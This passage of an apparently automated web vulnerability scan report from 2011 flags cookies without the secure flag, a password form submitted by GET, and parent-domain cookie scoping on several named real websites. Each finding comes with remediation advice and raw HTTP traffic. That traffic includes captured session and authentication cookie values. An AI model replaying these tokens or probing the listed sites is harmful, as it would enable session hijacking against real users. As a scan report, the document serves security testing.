Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_VanityFair HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:01 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:52 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Vogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:20 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:00 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_W HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Wired HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:36 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

9. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10. Cookie scoped to parent domain previous next
There are 27 instances of this issue:

http://www.43things.com/person/
http://www.admob.com/
http://www.walmart.com/x22
http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json
http://ad.doubleclick.net/activity
http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel
http://ad.doubleclick.net/clk
http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel
http://ad.insightexpressai.com/adserver/adServer.aspx
http://b.scorecardresearch.com/b
http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://download.cnet.com/1770-20_4-0.html
http://download.cnet.com/8300-2007_4-12.xml
http://download.cnet.com/8301-2007_4-20015771-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html--
http://download.cnet.com/8301-2007_4-20027865-12.html
http://download.cnet.com/download-blog/
http://download.cnet.com/mac/
http://download.cnet.com/mobile-downloads/
http://download.cnet.com/webware-apps/
http://download.cnet.com/windows/
http://landesm.gfi.com/event-log-analysis-sm/
http://www.zdnet.com/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.43things.com
Path:	/person/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. http://www.admob.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.admob.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
<head>
<title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...

10.3. http://www.walmart.com/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.walmart.com
Path:	/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Wed, 12 Jan 2011 15:26:32 GMT
Expires: Wed, 12 Jan 2011 15:26:32 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:33 GMT
Content-Length: 11881
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Via: HTTP/1.1 nw307 (nw307_7330869248_73610240)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css"
...[SNIP]...

10.4. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.crwdcntrl.net
Path:	/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=ctst

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 62

CN.ad.lotame.tags={"Profile": {"Audiences": {"Audience":[]}}};

10.5. http://ad.doubleclick.net/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&_dc_ck=try HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT
Date: Tue, 11 Jan 2011 13:27:09 GMT
